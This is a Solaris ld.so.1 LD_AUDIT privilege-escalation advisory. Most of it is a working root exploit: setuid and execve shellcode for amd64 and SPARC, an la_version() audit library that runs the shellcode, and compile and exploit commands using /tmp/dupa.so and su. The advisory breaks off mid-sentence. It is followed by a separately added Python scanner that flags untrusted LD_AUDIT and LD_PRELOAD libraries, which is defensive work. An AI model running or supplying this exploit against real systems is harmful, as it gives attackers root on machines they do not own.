Sun Solaris Runtime Linker LD_AUDIT Privilege Escalation Vulnerability
An exploit is not required, but proof-of-concept demonstration code was provided. The Solaris runtime linker (ld.so.1) honoured the LD_AUDIT environment variable for set-user-ID binaries, so a shared object named in LD_AUDIT was loaded and its la_version() audit entry point called with the privileges of the set-user-ID program.

For Solaris 10 on amd64:

    /* setuid(0) followed by execve("/bin/sh") */
    static char sh[] =
        "\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff"
        "\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff"
        "\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3"
        "\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

    /* la_version() is the first audit-interface routine ld.so.1 calls in an
     * LD_AUDIT library; here it transfers control to the code in sh[]. */
    unsigned int la_version(unsigned int version)
    {
        void (*f)(void);
        f = (void (*)(void))sh;
        f();
        return 3;
    }

For Solaris 9 SPARC:

    char sh[] =
        /* setuid() */
        "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
        /* execve() */
        "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
        "\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
        "\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

    /* Same audit entry point as the amd64 version above. */
    unsigned int la_version(unsigned int version)
    {
        void (*f)(void);
        f = (void (*)(void))sh;
        f();
        return 3;
    }

To compile:

    gcc -fPIC -shared -o /tmp/dupa.so dupa.c

And to exploit:

    export LD_AUDIT=/tmp/dupa.so
    su

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following proof of concept (Schily-Root.tar) has been provided by KF (lists) (kf_lists@digitalmunition.com) for SchilliX:
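Separately from the advisory's own proof-of-concept code above, the following is an added defender-side check (not part of the advisory): it scans /proc/<pid>/environ-style records for LD_AUDIT or LD_PRELOAD values naming a library outside the system library directories, the pattern the exploit relies on (a library under /tmp). The record format, the TRUSTED_DIRS list and the sample data are assumptions constructed for the example.

```python
"""Flag processes whose environment names an untrusted LD_AUDIT/LD_PRELOAD library.

Constructed /proc/<pid>/environ-style records (NUL-separated KEY=VALUE bytes)
stand in for a live system so the check runs offline.
"""
import os

# Runtime-linker variables that make ld.so.1 load a caller-chosen object
# (Solaris also honours the _32/_64 variants).
WATCHED_VARS = ("LD_AUDIT", "LD_AUDIT_32", "LD_AUDIT_64",
                "LD_PRELOAD", "LD_PRELOAD_32", "LD_PRELOAD_64")
# Assumed set of directories a legitimate audit/preload library may live in.
TRUSTED_DIRS = ("/lib", "/usr/lib", "/usr/sfw/lib")

def parse_environ(raw: bytes) -> dict:
    """Split a NUL-separated environ blob into a dict, skipping malformed entries."""
    env = {}
    for entry in raw.split(b"\0"):
        if b"=" in entry:
            key, _, value = entry.partition(b"=")
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env

def untrusted_libs(env: dict) -> list:
    """Return (var, lib) for every watched variable naming a library outside TRUSTED_DIRS."""
    hits = []
    for var in WATCHED_VARS:
        if var not in env:
            continue
        # ld.so.1 accepts colon- or whitespace-separated lists of objects.
        for lib in env[var].replace(":", " ").split():
            path = os.path.normpath(lib)
            # A bare file name (no directory) is also flagged: it is not a trusted path.
            if not any(path.startswith(d + "/") for d in TRUSTED_DIRS):
                hits.append((var, lib))
    return hits

def scan(records: list) -> list:
    """records: (pid, exe, environ_bytes) tuples. Return findings for processes to review."""
    return [{"pid": pid, "exe": exe, "var": var, "lib": lib}
            for pid, exe, raw in records
            for var, lib in untrusted_libs(parse_environ(raw))]

# Constructed sample: the first record mirrors the advisory's LD_AUDIT=/tmp/... pattern.
SAMPLE = [
    (4242, "/usr/bin/su", b"PATH=/usr/bin\0LD_AUDIT=/tmp/dupa.so\0HOME=/export/home/u\0"),
    (4243, "/usr/bin/ls", b"PATH=/usr/bin\0LD_PRELOAD=/usr/lib/libexample.so\0"),
    (4244, "/usr/bin/vi", b"PATH=/usr/bin\0TERM=xterm\0"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"pid {f['pid']} ({f['exe']}): {f['var']}={f['lib']} is outside trusted lib dirs")
```

On a live Solaris host the records would be built by reading each process's environment; the path whitelist should be adjusted to the system's actual library locations.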